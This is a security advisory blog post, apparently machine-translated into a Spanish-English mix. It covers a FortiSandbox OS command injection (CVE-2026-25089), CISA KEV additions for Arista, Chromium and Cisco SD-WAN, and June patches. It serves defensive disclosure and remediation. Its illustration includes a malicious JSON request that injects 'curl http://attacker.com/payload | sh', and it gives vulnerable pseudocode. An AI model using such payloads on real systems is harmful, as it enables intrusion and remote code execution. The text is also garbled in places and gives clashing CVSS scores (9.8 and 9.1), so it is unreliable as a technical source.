CVE-2026-25089: FortiSandbox Unuthenticated RCE + CISA KEV June 9 Additions (Arista, Cisco SD-WAN)
Causa de raíz técnica para la vulnerabilidad de inyección de comando OS no autenticada en electrodomésticos Fortinet FortiSandbox.
CVE-2026-25089
Severidad: CVSS 9.8
Situación: CISA KEV Emergency Addition Componente de destino: Fortinet FortiSandboxEste post forma parte del Semana del 12 de junio de 2026.
Parte 1: CVE-2026-25089 — FortiSandbox Unuthenticated OS Command Injection (CVSS 9.1)
Vulnerability Overview
CVE-2026-25089 es una inyección crítica de comando OS (CWE-78) en el FortiSandbox Web UI. La vulnerabilidad existe en la característica "start VNC" de la GUI, donde la entrada JSON especialmente elaborada activa una inyección de comando de segunda orden, permitiendo una nouthenticated remota attacker to execution arbitrary OS commands como raíz en el sistema subyacente.
CVE: CVE-2026-25089
CVSS v3.1: 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CWE: CWE-78 (OS Command Injection)
Asesoramiento: FG-IR-26-141 (Fortinet, June 9, 2026)
Discovery: Adham El Karn, Fortinet Equipo de Seguridad del Producto
Explotación activa: Ninguno notificado en el momento de escribir
Versiones afectadas
- FortiSandbox 5.0.0 – 5.0.5 → fijado: 5.0.6
- FortiSandbox 4.4.0 – 4.4.8 → Fijación: 4.4.9
- FortiSandbox 4.2.x (all) → actualización necesaria
- FortiSandbox Cloud 5.0.4 – 5.0.5 → Fijación: Cloud 5.0.6
- FortiSandbox PaaS 5.0.4 – 5.0.5 → fijado: PaaS 5.0.6
Análisis técnico
La vulnerabilidad es una inyección de comando de segunda orden. El punto final "start VNC" en el FortiSandbox Web UI acepta parámetros JSON incluyendo un identificador de sesión o campo de nombre de host. Este valor no está suficientemente vaciado antes de pasar a un comando de shell dentro del proceso de backend de la aplicación. Al inyectar metacaractores de cáscara (;, |, $(...), backticks) en el campo JSON, un atacante puede inyectar comandos arbitrarios que ejecutan cuando el backend procesa la solicitud.
# Simplified illustration of the vulnerability class (not working exploit):
# Normal request:
POST /api/v1/sandbox/vnc/start
{"session_id": "abc123"}
# Malicious request:
POST /api/v1/sandbox/vnc/start
{"session_id": "abc123; curl http://attacker.com/payload | sh #"}
# Backend (vulnerable pseudocode):
os.system(f"start-vnc-session {session_id}") # session_id is unsanitized
Remediación
# Step 1: Identify your FortiSandbox version
# Via FortiSandbox CLI:
get system status | grep Version
# Step 2: Upgrade to fixed version
# FortiSandbox 5.0.6: https://support.fortinet.com/
# FortiSandbox 4.4.9: https://support.fortinet.com/
# Step 3: Workaround (if immediate upgrade is not possible)
# Restrict web UI access to management networks only:
config system admin setting
set access-protocol https
set http-redirect enable
end
# Apply ACL to management interface to restrict source IPs
# Step 4: Verify your installation post-patch
get system status | grep "FortiSandbox"
# Confirm version shows 5.0.6, 4.4.9, or later
Parte 2: Adiciones CISA KEV - 9 de junio de 2026
CISA agregó tres vulnerabilidades al catálogo de vulnerabilidades explotadas conocidos el 9 de junio de 2026. FCEB agencies have until 23 de junio de 2026 para remediar.
CVE-2026-7473 — Arista EOS Vulnerabilidad de comparación incompleta
El sistema operativo extensible de Arista (EOS) contiene una vulnerabilidad de comparación incompleta (CWE-697) que puede ser explotada por un atacante con acceso a la red de la interfaz de gestión. Operadores de red: consulte Arista's June 2026 Security Advisory para versiones EOS afectadas e instrucciones de parche. Actualización del EOS mediante show version → install source flujo de trabajo en sus dispositivos Arista.
CVE-2026-11645 — Google Chromium V8 OOB (cubierta anteriormente)
Ver el Chrome V8 Zero-Day profundo-dive para el análisis técnico completo.
CVE-2026-20245 — Cisco Catalyst SD-WAN Manager Improper Output Encoding
Una codificación inadecuada o escape de salida (CWE-116) en Cisco Catalyst SD-WAN Manager permite que un atacante autenticado inyecte contenido malicioso. Si SD-WAN Manager es de Internet (no recomendado), esto se convierte en un parche de mayor prioridad. Consulta Cisco Security Advisory para versiones SD-WAN Manager afectadas y rutas de actualización.
# Arista EOS: check version and available patches
show version
# Then upgrade via:
# bash sudo install source aboot://EOS-x.y.z.swi
# Cisco SD-WAN Manager: check version
show sdwan version
# Apply patches per Cisco Security Advisory
# Use Cisco's standard firmware upgrade workflow via vManage UI
Junio 2026 Patches Vendor
Ivanti: Múltiples vulnerabilidades críticas parcheadas en Ivanti Connect Secure e Ivanti Policy Secure. Los productos de Ivanti han sido un objetivo persistente en 2026; aplicar parches inmediatamente y revisar su implementación de Ivanti para señales de compromiso previo utilizando la herramienta de control de integridad de Ivanti (TIC).
SAP: Junio 2026 Security Patch Day abordó múltiples vulnerabilidades críticas incluyendo bypass de autenticación y problemas de ejecución remota de códigos en SAP NetWeaver y componentes relacionados. Siga SAP ONE Support Launchpad para la guía de implementación de parches.